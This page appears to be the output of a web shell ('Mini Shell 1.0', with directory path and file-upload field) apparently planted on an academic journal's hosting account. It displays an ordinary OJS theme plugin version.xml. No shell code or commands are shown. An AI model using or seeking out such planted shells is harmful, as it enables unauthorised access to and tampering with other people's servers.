HOME


Mini Shell 1.0
DIR: /home/dhnidqcz/journal.pragmaticsng.org/plugins__47455f6/themes/pragma/
Upload File :
Current File : /home/dhnidqcz/journal.pragmaticsng.org/plugins__47455f6/themes/pragma/version.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE version SYSTEM "../../../lib/pkp/dtd/pluginVersion.dtd">

<!--
  * plugins/themes/pragma/version.xml
  *
  * Copyright (c) 2014-2020 Simon Fraser University
  * Copyright (c) 2003-2020 John Willinsky
  * Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
  *
  * Plugin version information.
  -->

<version>
	<!-- The application should match the theme folder to ensure it is unique -->
	<application>pragma</application>

	<!-- The type should always be `plugins.themes` -->
	<type>plugins.themes</type>

	<!--
		The current version. It should always include 4 numbers.
	    Valid: 1.0.2.3, 0.1.4.0
		Invalid: 1.0, v1.0.4, 1.0.0.0b
	-->
	<release>1.1.1.0</release>

	<!-- The date of the latest version -->
	<date>2022-10-31</date>

	<!-- This should always be 1 -->
	<lazy-load>1</lazy-load>

	<!-- The class name of the plugin. See index.php -->
	<class>PragmaThemePlugin</class>
</version>